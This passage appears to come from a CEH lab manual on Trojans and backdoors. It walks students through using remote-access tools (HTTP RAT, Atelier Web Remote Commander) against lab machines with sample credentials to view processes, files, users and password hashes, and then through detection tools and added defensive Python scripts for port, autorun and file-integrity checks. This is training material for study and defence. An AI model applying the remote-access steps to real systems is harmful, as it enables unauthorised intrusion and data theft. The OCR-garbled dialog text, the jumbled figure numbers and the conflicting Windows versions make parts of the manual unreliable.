[Screenshot: the "running processes" page of HTTP_RAT at http://10.0.0.12/proc, listing every process on the victim (System, smss.exe, csrss.exe, wininit.exe, winlogon.exe, services.exe, lsass.exe, several svchost.exe, dwm.exe, spoolsv.exe, MsMpEng.exe, taskhost.exe, explorer.exe, SearchIndexer.exe, Snagit32.exe, TscHelp.exe, SnagPriv.exe, SnagitEditor.exe, splwow64.exe, httpserver.exe, Taskmgr.exe, firefox.exe) with a [kill] link next to each.]

FIGURE 5.11: Process list of the victim computer

13. You can kill any running process from here.
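The detection angle of this lab is the listening socket: W3SVC had to be stopped because HTTP RAT binds port 80, so on the victim the port is now owned by httpserver.exe instead of the svchost.exe -k iissvcs process that FIGURE 5.4 shows as the legitimate owner. The script below is an added example, not code from the lab manual or from HTTP RAT; it joins the output of netstat -ano and tasklist on PID and compares every TCP listener with a policy of expected owners. The netstat and tasklist text and the policy of expected listeners are constructed, and the same check would have flagged the proxy Trojan of the previous lab on port 8080.

```python
"""Flag TCP listeners that are owned by an unexpected process.

Added example, not from the lab manual. It parses the text printed by
'netstat -ano' and 'tasklist' on Windows, joins them on PID, and compares
each LISTENING socket against a policy of which image names may own which
port. The sample output below is constructed to model the lab's Windows 8
victim after W3SVC was disabled and httpserver.exe took over port 80.
"""
import re

# Constructed 'netstat -ano' output (not captured from a real host).
SAMPLE_NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       1844
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       716
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    10.0.0.12:49160        10.0.0.13:445          ESTABLISHED     4
  UDP    0.0.0.0:5355           *:*                                    1020
"""

# Constructed 'tasklist' output.
SAMPLE_TASKLIST = """
Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
System                           4 Services                   0        296 K
svchost.exe                    716 Services                   0      8,120 K
svchost.exe                   1020 Services                   0      6,512 K
httpserver.exe                1844 Console                    1      1,228 K
"""

# Assumed policy for this host: port 80 belongs to IIS, which runs as W3SVC
# inside svchost.exe, so any other image on port 80 is a finding.
EXPECTED_LISTENERS = {80: {"svchost.exe"}, 135: {"svchost.exe"}, 445: {"System"}}

TASKLIST_RE = re.compile(r"^(\S+)\s+(\d+)\s+\S+\s+\d+\s+[\d,]+ K\s*$")


def parse_tasklist(text):
    """Map PID -> image name; header and separator lines do not match the regex."""
    pids = {}
    for line in text.splitlines():
        m = TASKLIST_RE.match(line)
        if m:
            pids[int(m.group(2))] = m.group(1)
    return pids


def parse_listeners(text):
    """Yield (port, pid) for every TCP socket in LISTENING state.

    UDP rows have no State column and are skipped here; ESTABLISHED rows
    are client connections, not listeners.
    """
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 5 and parts[0] == "TCP" and parts[3] == "LISTENING":
            port = int(parts[1].rsplit(":", 1)[1])
            yield port, int(parts[4])


def unexpected_listeners(netstat_text, tasklist_text, policy):
    """Return one finding string per listener whose owner is not in the policy."""
    images = parse_tasklist(tasklist_text)
    findings = []
    for port, pid in parse_listeners(netstat_text):
        image = images.get(pid, "<unknown>")
        allowed = policy.get(port)
        if allowed is None:
            findings.append(f"port {port}: unlisted listener {image} (PID {pid})")
        elif image not in allowed:
            expected = "/".join(sorted(allowed))
            findings.append(f"port {port}: {image} (PID {pid}) instead of {expected}")
    return findings


if __name__ == "__main__":
    for finding in unexpected_listeners(SAMPLE_NETSTAT, SAMPLE_TASKLIST, EXPECTED_LISTENERS):
        print(finding)
```

Matching on image name is only the first filter: a backdoor can name itself svchost.exe, so a production version of this check would also compare the image path against the expected system directory and the file's signature, the two properties the "Unknown Publisher" warning in FIGURE 5.8 already exposed.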

Lab Analysis
Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure through public and free information.


PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Tool/Utility: HTTP Trojan
Information Collected/Objectives Achieved: Successfully sent httpserver.exe to the victim machine
Output: Killed processes: System, smss.exe, csrss.exe, winlogon.exe, services.exe, lsass.exe, svchost.exe, dwm.exe, splwow64.exe, httpserver.exe, firefox.exe

Questions
1. Determine the ports that the HTTP proxy server Trojan uses to communicate.

Internet Connection Required
☐ Yes ☑ No
Platform Supported
☑ Classroom ☑ iLabs


Remote Access Trojans Using Atelier Web Remote Commander

A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.
ICON KEY: Valuable information / Test your knowledge / Web exercise / Workbook review

Lab Scenario
A backdoor Trojan is a very dangerous infection that compromises the integrity of a computer, its data, and the personal information of its users. Remote attackers use backdoors as a means of accessing and taking control of a computer while bypassing its security mechanisms. Trojans and backdoors are types of bad-ware; their main purpose is to send and receive data, and especially commands, through a port to another system. This port can even be a well-known port such as 80, or an out-of-the-norm port like 7777. Trojans are most of the time disguised as legitimate and harmless applications to encourage the user to execute them.
You are a security administrator of your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, theft of valuable data from the network, and identity theft.

Lab Objectives
The objective of this lab is to help students learn to detect Trojan and backdoor attacks.
The objectives of this lab include:
• Gain access to a remote computer
• Acquire sensitive information of the remote computer
Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors

Lab Environment
To carry out this lab, you need:
■ Atelier Web Remote Commander located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Remote Access Trojans (RAT)\Atelier Web Remote Commander


■ A computer running Windows Server 2008 (host)
■ Windows Server 2003 running in a virtual machine
■ If you decide to download the latest version, then the screenshots shown in the lab might differ
■ You need a web browser to access the Internet
■ Administrative privileges to run tools

Lab Duration
Time: 20 Minutes

Overview of Trojans and Backdoors

A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.
Note: The version and appearance of the created client or host may differ from what is shown in the lab, but the actual process of connecting to the server and accessing the processes is the same as shown in this lab.

Lab Tasks
TASK 1: Atelier Web Remote Commander

1. Install and launch Atelier Web Remote Commander (AWRC) in Windows Server 2012.
2. To launch Atelier Web Remote Commander (AWRC), open the Start menu by hovering the mouse cursor over the lower-left corner of the desktop.
[Screenshot: the Windows Server 2012 desktop (Evaluation copy) with the Start tile shown in the lower-left corner.]

FIGURE 6.1: Windows Server 2012 Start-Desktop

3. Click AW Remote Commander Professional in the Start menu apps.


[Screenshot: the Windows Server 2012 Start screen for the Administrator account, showing the AW Remote Commander tile among the apps.]

FIGURE 6.2: Windows Server 2012 Start Menu Apps

4. The main window of AWRC appears as shown in the following screenshot.

[Screenshot: AWRC PRO 9.3.9 main window with the tabs Desktop, SysInfo, NetworkInfo, File System, Users and Groups, and Chat; the Remote Host fields; a Progress Report pane; the Connect and Disconnect buttons; the "Request authorization" and "Clear on disconnect" options; and the kBytes In, kBps In and Connection Duration counters.]

Note: This tool is used to gain access to all the information of the remote system.

FIGURE 6.3: Atelier Web Remote Commander main window

5. Enter the IP address and the user name and password of the remote computer.
6. In this lab we have used Windows Server 2008 (10.0.0.13):
■ User name: Administrator
■ Password: qwerty@123
Note: The IP addresses and credentials might differ in your lab.
7. Click Connect to access the machine remotely.


FIGURE 6.4: Providing remote computer details

8. The following screenshots show that you are accessing Windows Server 2008 remotely.

[Screenshot: "10.0.0.13 : AWRC PRO 9.3.9", Desktop tab, showing the remote desktop of Windows Server 2008 (Internet Explorer, Windows Update and Notepad icons). The Progress Report reads "#16:28:24 Initializing, please wait..." and "#16:28:25 Connected to 10.0.0.13"; kBytes In: 201.94, Connection Duration: 1 Minute, 42 Seconds.]

FIGURE 6.5: Remote computer Accessed

9. The Commander is connected to the remote system. Click the SysInfo tab to view the complete details of the virtual machine.


FIGURE 6.6: Information of the remote computer


10. Select the NetworkInfo tab to view the network information.
[Screenshot: "10.0.0.13 : AWRC PRO 9.3.9", NetworkInfo tab (sub-tabs Ports, Shares, IP/Transport Protocols). The Shares list shows ADMIN$ (Remote Admin), C$ (Default share) and IPC$ (Remote IPC), each with unlimited Max Uses. Progress Report: "#16:28:24 Initializing, please wait", "#16:28:25 Connected to 10.0.0.13"; kBytes In: 250.93, Connection Duration: 5 Minutes, 32 Seconds.]

FIGURE 6.7: Information of the remote computer

11. Select the File System tab. Select c:\ from the drop-down list and click Get.
12. This tab lists the complete files of the C:\ drive of Windows Server 2008.



FIGURE 6.8: Information of the remote computer

13. Select Users and Groups, which will display the complete user details.

FIGURE 6.9: Information of the remote computer


FIGURE 6.10: Information of the remote computer

FIGURE 6.11: Information of the remote computer

14. This tool will display all the details of the remote system.
15. Analyze the results of the remote computer.

Lab Analysis
Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure through public and free information.


PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Tool/Utility: Atelier Web Remote Commander
Information Collected/Objectives Achieved: Remotely accessing Windows Server 2008
Result:
■ System information of remote Windows Server 2008
■ Network Information Path of remote Windows Server 2008
■ Viewing complete files of c:\ of remote Windows Server 2008
■ User and Groups details of remote Windows Server 2008
■ Password hashes

Questions
1. Evaluate the ports that AWRC uses to perform operations.
2. Determine whether it is possible to launch AWRC from the command line and make a connection. If yes, then illustrate how it can be done.

Internet Connection Required
[ ] Yes [x] No
Platform Supported
[x] Classroom


Detecting Trojans
A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.

Lab Scenario
Most individuals are confused about the possible ways to remove a Trojan virus from a specific system. One must realize that the World Wide Web is one of the tools that transmits information as well as malicious and harmful viruses. A backdoor Trojan can be extremely harmful if not dealt with appropriately. The main function of this type of virus is to create a backdoor in order to access a specific system. With a backdoor Trojan attack, a concerned user is unaware about the possible effects until sensitive and important information is found missing from a system. With a backdoor Trojan attack, a hacker can also perform other types of malicious attacks as well. The other name for backdoor Trojans is remote access Trojans. The main reason that backdoor Trojans are so dangerous is that they hold the ability to access a particular machine remotely (source: http://www.combofix.org).
You are a security administrator of your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, theft of valuable data from the network, and identity theft.

Lab Objectives
The objective of this lab is to help students learn to detect Trojan and backdoor attacks.
The objectives of the lab include:
• Analyze using Port Monitor
• Analyze using Process Monitor
• Analyze using Registry Monitor
• Analyze using Startup Program Monitor
• Create MD5 hash files for Windows directory files


Lab Environment
To carry out this lab, you need:
■ Tcpview, located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Port Monitoring Tools\TCPView
■ Autoruns, located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Process Monitoring Tools\Autoruns
■ PrcView, located at C:\CEH-Tools\CEHv7 Module 06 Trojans and Backdoors\Process Monitor Tool\Prc View
■ jv16 Power Tool, located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Registry Monitoring Tools\jv16 Power Tools 2012
■ FsumFrontEnd, located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Files and Folder Integrity Checker\Fsum Frontend
■ A computer running Windows Server 2008 (host)
■ Windows Server 2003 running in Virtual Machine
■ If you decide to download the latest version, then screenshots shown in the lab might differ
■ You need a web browser to access Internet
■ Administrative privileges to run tools

Note (Autoruns, disabling and deleting entries): If you don't want an entry to be active the next time you boot or log in, you can either disable or delete it. To disable an entry, uncheck it. Autoruns will store the startup information in a backup location so that it can reactivate the entry when you recheck it. For items stored in startup folders, Autoruns creates a subfolder named Autoruns disabled. Check a disabled item to re-enable it.

Lab Duration
Time: 20 Minutes

Overview of Trojans and Backdoors
A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.
Note: The versions of the created client or host and appearance may differ from what it is in the lab, but the actual process of connecting to the server and accessing the processes is the same as shown in this lab.

Lab Tasks
TASK 1: Tcpview
1. Go to Windows Server 2012 Virtual Machine.
2. Install Tcpview from the location D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Port Monitoring Tools\TCPView.
3. The TCPView main window appears, with details such as Process, Process ID, Protocol, Local Address, Local Port, Remote Address, and Remote Port.


Note (Autoruns): You should delete items that you do not wish to ever execute. Do so by choosing Delete in the Entry menu. Only the currently selected item will be deleted.


FIGURE 8.1: Tcpview Main window

4. This tool performs port monitoring.

FIGURE 8.2: Tcpview Main window

5. Now it is analyzing the SMTP and other ports.


Note (Autoruns): If you are running Autoruns without administrative privileges on Windows Vista and attempt to change the state of a global entry, you'll be denied access. Autoruns will display a dialog with a button that enables you to re-launch Autoruns with administrative rights. You can also use the -e command-line option to launch Autoruns with administrative rights.
Note (Autoruns): There are several ways to get more information about an autorun location or entry. To view a location or entry in Explorer or Regedit, choose Jump To in the Entry menu or double-click on the entry or location's line in the display.

FIGURE 8.3: Tcpview analyzing ports

You can also kill the process by double-clicking that respective process, and then clicking the End Process button.

FIGURE 8.4: Killing Processes
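The check TCPView lets you do by eye (which process owns which listening port) can be repeated against a saved baseline. The script below is an added example, not code from the CEH lab or from Sysinternals; the netstat and tasklist lines it parses are constructed samples and the BASELINE set is an assumed known-good list for this server role.

```python
"""Flag listening sockets that are not in a known-good baseline.

Added example, not part of the CEH lab and not TCPView's own code. It
applies the check the TCPView task does by eye (which process owns which
listening port) to text output, so it can be rerun and compared over time.
Both samples below are constructed, not captured from a real host.
"""
import csv
import io
from collections import namedtuple

Listener = namedtuple("Listener", "proto local_addr port pid process")

# Constructed sample in the layout of `netstat -ano` on Windows.
SAMPLE_NETSTAT = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:53             0.0.0.0:0              LISTENING       1572
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       892
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       3092
  TCP    0.0.0.0:31337          0.0.0.0:0              LISTENING       5120
  TCP    10.0.0.13:445          10.0.0.21:49158        ESTABLISHED     4
  TCP    [::]:135               [::]:0                 LISTENING       892
  UDP    0.0.0.0:53             *:*                                    1572
  UDP    0.0.0.0:6667           *:*                                    5120
"""

# Constructed sample in the layout of `tasklist /fo csv /nh` (image name, PID, ...).
SAMPLE_TASKLIST = """\
"dns.exe","1572","Services","0","17,240 K"
"svchost.exe","892","Services","0","9,112 K"
"System","4","Services","0","1,204 K"
"svchost.exe","3092","Services","0","12,004 K"
"svchost.exe","5120","Console","1","6,548 K"
"""

# Assumed known-good (process, protocol, port) triples for this server role.
# In practice this is captured from a freshly built host, not written by hand.
BASELINE = {
    ("dns.exe", "TCP", 53),
    ("dns.exe", "UDP", 53),
    ("svchost.exe", "TCP", 135),
    ("System", "TCP", 445),
    ("svchost.exe", "TCP", 3389),
}


def parse_tasklist(text):
    """Map PID -> image name from CSV tasklist output."""
    return {int(row[1]): row[0] for row in csv.reader(io.StringIO(text)) if row}


def parse_netstat(text, pid_to_name):
    """Yield one Listener per LISTENING TCP socket and per bound UDP socket."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4 or parts[0] not in ("TCP", "UDP"):
            continue                # header, blank or unrelated line
        proto = parts[0]
        addr, _, port = parts[1].rpartition(":")   # also splits [::]:135 correctly
        if proto == "TCP":
            if len(parts) < 5 or parts[3] != "LISTENING":
                continue            # established / time-wait sockets are not listeners
            pid = int(parts[4])
        else:
            pid = int(parts[3])     # UDP rows carry no State column
        yield Listener(proto, addr, int(port), pid, pid_to_name.get(pid, "<unknown>"))


def unexpected_listeners(netstat_text, tasklist_text, baseline):
    """Return listeners whose (process, proto, port) triple is not in the baseline.

    A PID missing from tasklist (process exited or hidden) maps to "<unknown>",
    which can never match a baseline entry, so such sockets are always reported.
    """
    names = parse_tasklist(tasklist_text)
    seen = set()
    found = []
    for lst in parse_netstat(netstat_text, names):
        key = (lst.process, lst.proto, lst.port)
        if key in baseline or key in seen:
            continue
        seen.add(key)
        found.append(lst)
    return sorted(found, key=lambda l: (l.proto, l.port))


if __name__ == "__main__":
    for lst in unexpected_listeners(SAMPLE_NETSTAT, SAMPLE_TASKLIST, BASELINE):
        print(f"UNEXPECTED {lst.proto} {lst.local_addr}:{lst.port} "
              f"pid={lst.pid} ({lst.process})")
```

Note that a familiar image name such as svchost.exe is no reassurance on its own; the baseline keys on the process, protocol and port together, which is why the two sockets owned by PID 5120 are reported.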


TASK 2: Autoruns
Go to Windows Server 2012 Virtual Machine.
Double-click Autoruns.exe, which is located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Process Monitoring Tools\Autoruns.
It lists all processes, DLLs, and services.


Note (Autoruns): You can view Explorer's file properties dialog for an entry's image file by choosing Properties in the Entry menu. You can also have Autoruns automatically execute an Internet search in your browser by selecting Search Online in the Entry menu.

FIGURE 8.5: Autoruns Main Window

10. The following is the detailed list on the Logon tab.
Note (Autoruns): Simply run Autoruns and it shows you the currently configured auto-start applications in the locations that most directly execute applications. Perform a new scan that reflects changes to options by refreshing the display.
Note (Autoruns): Internet Explorer: This entry shows Browser Helper Objects (BHOs), Internet Explorer toolbars and extensions.

FIGURE 8.9: Autoruns Logon list

11. The following are the Explorer list details.


Note (Autoruns): Services: All Windows services configured to start automatically when the system boots.

FIGURE 8.10: Autoruns Explorer list

12. The following are the Services list details.
Note (Autoruns): Drivers: This displays all kernel-mode drivers registered on the system except those that are disabled.

FIGURE 8.11: Autoruns Services list

13. The following are the Drivers list details.
Note (Autoruns): Scheduled Tasks: Task scheduler tasks configured to start at boot or logon.

FIGURE 8.12: Autoruns Drivers list.

14. The following is the KnownDLLs list in Autoruns.

FIGURE 8.13: Autoruns Known DLLs list.

TASK 4: jv16 Power Tool
15. Install and launch jv16 PowerTools in Windows Server 2012 (host machine).
16. jv16 Power Tool is located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Registry Monitoring Tools\jv16 Power Tools 2012.
17. To launch jv16 PowerTools, select the Start menu by hovering the mouse cursor on the lower-left corner of the desktop.

FIGURE 7.1: Windows Server 2012 Start-Desktop

18. Click jv16 PowerTools 2012 in Start menu apps.

Note (Autoruns): Winlogon Notifications: Shows DLLs that register for Winlogon notification of logon events.

FIGURE 7.2: Windows Server 2012 Start Menu Apps

19. Click the Clean and fix my computer icon.

Note (Autoruns): Winsock Providers: Shows registered Winsock protocols, including Winsock service providers. Malware often installs itself as a Winsock service provider because there are few tools that can remove them. Autoruns can uninstall them, but cannot disable them.


FIGURE 8.20: jv16 Home page.

20. The Clean and fix my computer dialog box appears. Click the Settings tab and then click the Start button.
Note (Autoruns): LSA Providers: Shows registered Local Security Authority (LSA) authentication, notification and security packages.

FIGURE 8.21: jv16 Clean and fix my computer dialogue.

21. It will analyze your system for files; this will take a few minutes.
Note (Autoruns): Printer Monitor Drivers: Displays DLLs that load into the print spooling service. Malware has used this support to autostart itself.

FIGURE 8.22: jv16 Clean and fix my computer Analyzing.

22. Computer items will be listed after the complete analysis.
Note (Autoruns): You can save the results of a scan with File->Save and load a saved scan with File->Load. These commands work with native Autoruns file formats, but you can use File->Export to save a text-only version of the scan results. You can also automate the generation of native Autoruns export files with command line options.

FIGURE 8.24: jv16 Clean and fix my computer Items details.

23. Selected item details are as follows.

Note (Autoruns): Sidebar: Displays Windows sidebar gadgets.

Note (Autoruns): Compare the current Autoruns display with previous results that you've saved. Select File | Compare and browse to the saved file. Autoruns will display in green any new items, which correspond to entries that are not present in the saved file. Note that it does not show deleted items.

FIGURE 8.23: jv16 Clean and fix my computer Items.

24. The Registry junk section provides details for selected items.
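The Compare feature described in the Autoruns note above highlights new entries but not deleted ones. As an added example (not the lab's or Autoruns' own code), the script below diffs two export files and reports added, removed and re-pointed entries; both CSV samples are constructed and use an assumed, simplified column set (Entry Location, Entry, Enabled, Image Path), so map the column names if your export differs.

```python
"""Diff two Autoruns exports to report added, removed and re-pointed entries.

Added example, not part of the CEH lab and not Autoruns' own code. The
File | Compare feature shows new entries in green but not deleted ones;
this script reports both, plus entries whose image path changed (the
same autostart name now launching a different binary). Both exports are
constructed samples with an assumed, simplified column set; a real
Autoruns CSV export carries more columns.
"""
import csv
import io

# Constructed baseline export, saved from a known-good build.
BASELINE_CSV = r"""Entry Location,Entry,Enabled,Image Path
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run,HotKeysCmds,enabled,c:\windows\system32\hkcmd.exe
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run,IgfxTray,enabled,c:\windows\system32\igfxtray.exe
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run,Persistence,enabled,c:\windows\system32\igfxpers.exe
HKLM\System\CurrentControlSet\Services,osppsvc,enabled,c:\program files\common files\osppsvc.exe
"""

# Constructed export taken later from the same host.
CURRENT_CSV = r"""Entry Location,Entry,Enabled,Image Path
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run,HotKeysCmds,enabled,c:\windows\system32\hkcmd.exe
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run,IgfxTray,enabled,c:\windows\system32\igfxtray.exe
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run,Persistence,enabled,c:\users\public\igfxpers.exe
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run,UpdateSvc,enabled,c:\users\public\updatesvc.exe
"""


def load_entries(text):
    """Map (entry location, entry name) -> lower-cased image path from the CSV."""
    reader = csv.DictReader(io.StringIO(text))
    return {(row["Entry Location"], row["Entry"]): row["Image Path"].lower()
            for row in reader}


def diff_autoruns(baseline_text, current_text):
    """Return added, removed and changed (location, entry) keys, each sorted."""
    base = load_entries(baseline_text)
    cur = load_entries(current_text)
    return {
        "added": sorted(k for k in cur if k not in base),
        "removed": sorted(k for k in base if k not in cur),
        # same location and name, but the binary it launches is different
        "changed": sorted(k for k in cur if k in base and cur[k] != base[k]),
    }


def report(baseline_text, current_text):
    """Human-readable lines; a changed entry shows the old and new image path."""
    base = load_entries(baseline_text)
    cur = load_entries(current_text)
    d = diff_autoruns(baseline_text, current_text)
    lines = [f"ADDED   {loc}\\{name} -> {cur[(loc, name)]}"
             for loc, name in d["added"]]
    lines += [f"REMOVED {loc}\\{name} (was {base[(loc, name)]})"
              for loc, name in d["removed"]]
    lines += [f"CHANGED {loc}\\{name}: {base[(loc, name)]} -> {cur[(loc, name)]}"
              for loc, name in d["changed"]]
    return lines


if __name__ == "__main__":
    print("\n".join(report(BASELINE_CSV, CURRENT_CSV)))
```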
FIGURE 8.25: jv16 Clean and fix my computer Item registry junk.

25. Select all check boxes in the item list and click Delete. A dialog box appears. Click Yes.

Note (Autoruns): When the Hide Empty Locations selection in the Options menu is checked, Autoruns doesn't show locations with no entries.

jv16 PowerTools 2012 [W8-x64] - Clean and fix my computer[


File Select Tools Help
Item
Seventy
Description
Tags

Item Seventy Descnption Tags

0 J
jv16 PowerTools 2012

Y ou are a bo ut to delete a lo t o f erroneous registry data. Using th e Fix

O o p tio n is always th e better o p tio n . Are y o u sure y o u kn o w w h a t yo u are


d o in g and w a n t to proceed?

0 *I S la il m enu a n d d e s k to p item s 23/23

S e le c te d j2 9 ^ h ig h lig h te d ftto ta h 2 9 6

FIGURE 8.26: jvl6 Clean and fix my compute! Item check box.

26. Go to the Home tab, and click the Control which programs start automatically icon.

The Verify Signatures option appears in the Options menu on systems that support image signing verification and can result in Autoruns querying certificate revocation list (CRL) web sites to determine if image signatures are valid.

FIGURE 8.28: jv16 Control which programs start automatically.

27. Check programs in Startup Manager, and then you can select the appropriate action.
The Hide Microsoft Entries selection omits images that have been signed by Microsoft if Verify Signatures is selected, and omits images that have Microsoft in their resource's company name field if Verify Signatures is not selected.

FIGURE 8.29: jv16 Startup Manager dialog.

28. Click the Registry Tools menu to view the registry icons.

Use the Hide Microsoft Entries or Hide Windows Entries selection in the Options menu to help you identify software that's been added to a system since installation. Autoruns prefixes the name of an image's publisher with "(Not verified)" if it cannot verify a digital signature for the file that's trusted by the system.

FIGURE 8.30: jv16 Registry tools.

29. Click File Tools to view the file icons.

The Hide Windows Entries selection omits images signed by Windows if Verify Signatures is selected. If Verify Signatures is not selected, Hide Windows Entries omits images that have Microsoft in their resource's company name field and that reside beneath the %SystemRoot% directory.

FIGURE 8.31: jv16 File tools.

30. Click System Tools to view the system icons.


FIGURE 8.32: jv16 System tools.

31. Click Privacy Tools to view the privacy icons.


FIGURE 8.33: jv16 Privacy tools.

32. Click Backups in the menu to display the Backup Tool dialog box.

FIGURE 8.34: jv16 Backup tool.


33. Go to the Windows Server 2012 virtual machine.

TASK 5: FsumFrontEnd

34. Double-click FsumFrontEnd.exe, the executable file located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Files and Folder Integrity Checker\Fsum Frontend.

35. The Fsum Frontend main window is shown in the following screenshot.
FIGURE 8.35: FsumFrontEnd main window.

CEH-Tools are also located on the mapped network drive (Z:) of the virtual machines.

36. Select the type of hash that you want, let's say md5. Check the md5 check box.

FIGURE 8.36: FsumFrontEnd checking md5.

37. Select a file by clicking the File browse button and choosing it from the desktop; here, that file is Test.txt.

Have Autoruns automatically execute an Internet search in your browser by selecting Search Online in the Entry menu.

FIGURE 8.37: FsumFrontEnd file browse.

Autoruns displays the text "(Not verified)" next to the company name of an image that either does not have a signature or has a signature that is not signed by a certificate root authority on the list of root authorities trusted by the system.

FIGURE 8.38: FsumFrontEnd file open.

38. Click Add Folder to select a folder to be added to the hash, for example, D:\CEH-Tools.

FIGURE 8.39: FsumFrontEnd Add Folder.

A "Hide Signed Microsoft Entries" option helps you to zoom in on third-party auto-starting images that have been added to your system.

FIGURE 8.40: FsumFrontEnd Adding Folder.

39. The files of the selected folder will be listed in a list box.

FIGURE 8.41: FsumFrontEnd files list.

40. Click Generate checksum files. The progress bar shows the percentage of the hash files generated so far.

FIGURE 8.42: FsumFrontEnd Generate checksum files.

You can also use the -e command-line option to initially launch Autoruns with administrative rights.

FIGURE 8.43: FsumFrontEnd progress of hash files.

41. The following is the list of md5 files after completion.

FIGURE 8.44: FsumFrontEnd list of hash files.
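The checksum-file workflow of steps 34 through 41 (hash every file under a folder, keep the digests, re-hash later and compare) is the core of any file and folder integrity checker. The block below is an added example written for this manual, not FsumFrontEnd's code or an EC-Council tool: it builds an md5sum-style manifest for a constructed temporary folder, then tampers with that folder and reports which files were modified, added, or removed. The file names, the manifest layout (`<digest> *<path>`) and the `sha256` option are assumptions; the empty Test.txt mirrors the lab's 0-byte sample file, whose md5 is the well-known digest of empty input.

```python
"""Added example (not FsumFrontEnd's code): a minimal file and folder
integrity checker. Sample files are constructed in a temporary directory
so the script runs offline."""
import hashlib
import os
import tempfile

CHUNK = 64 * 1024  # hash in 64 KiB chunks so large files are not read into RAM


def hash_file(path, algo="md5"):
    """Hex digest of one file. md5 matches the lab; sha256 is the better
    choice for a real baseline because md5 collisions are practical."""
    h = hashlib.new(algo)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(CHUNK), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root, algo="md5"):
    """Map each file under root (relative, '/'-separated) to its digest."""
    manifest = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            manifest[rel] = hash_file(full, algo)
    return manifest


def format_manifest(manifest):
    """Render as '<digest> *<path>' lines (md5sum-style checksum file)."""
    return "\n".join(f"{d} *{p}" for p, d in sorted(manifest.items())) + "\n"


def parse_manifest(text):
    """Inverse of format_manifest; ignores blank lines and '#' comments."""
    manifest = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        digest, _, path = line.partition(" *")
        manifest[path] = digest.lower()
    return manifest


def verify(root, baseline, algo="md5"):
    """Compare the folder's current state against a saved manifest."""
    current = build_manifest(root, algo)
    return {
        "modified": sorted(p for p in baseline if p in current and current[p] != baseline[p]),
        "added": sorted(p for p in current if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current),
    }


def demo():
    """Constructed scenario: baseline a folder, then tamper with it."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "sub"))
        with open(os.path.join(root, "Test.txt"), "wb"):
            pass  # 0-byte file, like the lab's Test.txt
        with open(os.path.join(root, "sub", "readme.txt"), "wb") as f:
            f.write(b"original contents\n")

        saved = format_manifest(build_manifest(root))  # the checksum file
        baseline = parse_manifest(saved)

        # Traces an intrusion leaves behind: one file altered, one planted, one deleted.
        with open(os.path.join(root, "sub", "readme.txt"), "ab") as f:
            f.write(b"tampered\n")
        with open(os.path.join(root, "sub", "dropped.dll"), "wb") as f:
            f.write(b"MZ")
        os.remove(os.path.join(root, "Test.txt"))

        return baseline, verify(root, baseline)


if __name__ == "__main__":
    baseline, report = demo()
    print(format_manifest(baseline))
    print(report)
```

A baseline is only as trustworthy as its storage: keep the manifest (and the checker) somewhere the monitored host cannot rewrite, otherwise a Trojan that alters a file can alter its recorded digest as well.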

Lab Analysis
Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure through public and free information.


PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Questions
1. Scenario: Alice wants to use TCPView to keep an eye on external connections. However, sometimes there are large numbers of connections with a Remote Address of "localhost:####". These entries do not tell Alice anything of interest, and the large quantity of entries causes useful entries to be pushed out of view.

2. Is there any way to filter out the "localhost:####" Remote Address entries?

3. Evaluate the other details displayed by "autoruns" and analyze the working of the autoruns tool.

4. Evaluate the other options of jv16 PowerTools and analyze the result.

5. Evaluate and list the algorithms that FsumFrontEnd supports.

